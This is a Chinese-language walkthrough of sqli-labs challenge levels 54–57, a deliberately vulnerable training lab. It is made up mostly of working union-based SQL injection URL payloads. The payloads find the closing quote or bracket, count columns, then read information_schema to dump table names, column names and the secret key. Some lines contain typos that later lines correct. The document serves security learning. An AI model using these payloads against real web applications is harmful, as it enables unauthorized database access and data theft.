sqlilabs通关04-挑战篇：less54-

less54

​​

提示的大致意思是：如果你不能在十次内注入成功，那么，表名、列名、数据就会刷新。

需要先在url中传递id参数进行注入尝试，然后获得密钥之后，填入到下面即为成功。

id=1‘ #无回显
?id=1' and 1=1--+ 有回显，所以大概率就是这个'闭合
?id=1' order by 4--+ 
?id=1' order by 3--+  有回显，那就是3个字段判断回显点
?id=a1' union select 1,2,3--+   回显2和3
接下来就是猜数据库名、表名、字段名、由于每次都会变化，所以我们把10次凑齐，然后再接着操作?id=1' union select 1,version(),database()--+  获取当前的数据库版本和数据库名称  challenges
?id=1' union select 1,2,group_conat(table_name) from inforamtion_schema.tables where table_schema=dabase();--+
?id=a1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()-- k      表名v1wqq27xdg
?id=a1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='v1wqq27xdg'-- k      字段：id,sessid,secret_ULRX,tryy
?id=a1' union select 1,2,(select group_concat(id,0x3e,sessid,0x3e,secret_ULRX,0x3e,tryy) from v1wqq27xdg)-- k      字段：id,sessid,secret_ULRX,tryy

​​

less55

和上面的同理，闭合符号为)​

?id=1
?id=1 and 1=2
?id=1 and sleep(3)--+
?id=1" and 1=1--+
?id=1)--+ #回显，说明是该闭合符
?id=1) order by 3--+
?id=1) order by 3--+ #不回显，说明3个字段
?id=12311) union select 2,3,4--+ #判断回显点
?id=12311) union select 2,database(),version()--+ #库名和版本号
?id=12311) union select 2,group_concat(table_name),version() from information_schema.tables where table_schema=database()--+ 爆表ixcgv88gur
?id=12311) union select 2,group_concat(table_name),version() from information_schema.tables where table_schema=database()--+ #为了方便，把次数用完，再爆一次 bvqe12szhe
?id=12311) union select 2,group_concat(column_name),version() from information_schema.columns where table_schema=database() and table_name='bvqe12szhe'--+ #爆字段名 id,sessid,secret_OGL8,tryy
?id=12311) union select 1,2,(select group_concat(id,0x3e,sessid,0x3e,secret_OGL8,0x3e,tryy) from bvqe12szhe)-- k #爆记录

​​

​​

less56

和上面的同理，闭合符号为')​

?id=1') and 1=1--+
?id=1') and 1=2--+  #闭合符号为')
?id=123131') union select 2,group_concat(table_name),version() from information_schema.tables where table_schema=database()--+ 爆表ofc8irr26r
?id=12311') union select 2,group_concat(column_name),version() from information_schema.columns where table_schema=database() and table_name='ofc8irr26r'--+ #爆字段名 id,sessid,secret_9FFM,tryy
?id=12311') union select 1,2,(select group_concat(id,0x3e,sessid,0x3e,secret_9FFM,0x3e,tryy) from ofc8irr26r)-- k #爆记录

​​

​​

​​

less57

闭合符号是"​

判断闭合符号

?id=1
?id=2 and 1=2--+
?id=2") and 1=2--+ 不回显
?id=2") and 1=1--+ 不回显
?id=2') and 1=1--+ 回显
?id=2') and 1=2--+ 回显
?id=2' and 1=2--+ 回显
?id=1" and 3=1--+ 不回显
?id=1" and 1=1--+ 回显，说明注入点的闭合符号是"

‍

?id=1" order by 3--+  判断字段数量
?id=1" order by 4--+  不回显，说明三个字段
回显点判断
?id=1" union select 1,2,3--+